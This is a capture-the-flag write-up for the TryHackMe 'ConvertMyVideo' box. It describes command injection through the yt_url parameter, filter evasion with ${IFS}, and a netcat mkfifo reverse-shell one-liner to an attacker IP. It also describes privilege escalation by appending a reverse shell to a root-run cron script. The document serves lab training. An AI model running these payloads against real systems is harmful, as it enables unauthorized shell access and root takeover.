# THM | ConvertMyVideo
This is a Linux box. You can find it [here](https://tryhackme.com/r/room/convertmyvideo).
#### Skill Learned
* Command Injection
* Finding Cron via Pspy64
## NMAP
IP:10.10.185.77
nmap
### Port 80
port 80
start burp
we found an error in the response
burp
## Foothold/shell
we can try for command injection
```
`whoami`
```
whoami
we get www-data
Let's see if we can get a hit on our machine using wget, more on ${IFS} [refer this](https://www.baeldung.com/linux/ifs-shell-variable)
```
using yt_url=`wget${IFS}http://10.9.0.78/`
```
we get the hit
Let's try for a [reverse shell](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```
replace " " with ${IFS} and "&" with %26
we get the shell but the connection is lost soon
let's try uploading the script and then executing it
now let's execute it
found flag.txt
flag.txt
## Priv Esc
copy LinEnum.sh to the box and run it
we found cron is running
found cron running
Let's copy pspy64 to the box and run
./pspy64
I found the cron script clean.sh
cat clean.sh
we can append the reverse shell and since it is triggered by the root we might get root shell
